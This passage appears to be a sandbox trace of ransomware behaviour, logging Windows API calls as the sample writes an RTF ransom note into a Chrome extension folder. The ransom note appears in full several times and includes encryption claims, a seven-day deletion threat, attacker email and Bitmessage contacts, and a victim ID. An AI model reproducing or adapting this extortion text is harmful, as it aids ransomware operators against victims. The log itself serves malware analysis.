k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f3\x0e", lpUsedDefaultChar=0x0) returned 8717 [0288.083] WriteFile (in: hFile=0x2c8, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.084] CloseHandle (hObject=0x2c8) returned 1 [0288.084] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0288.084] GetLastError () returned 0x2 [0288.084] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0288.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 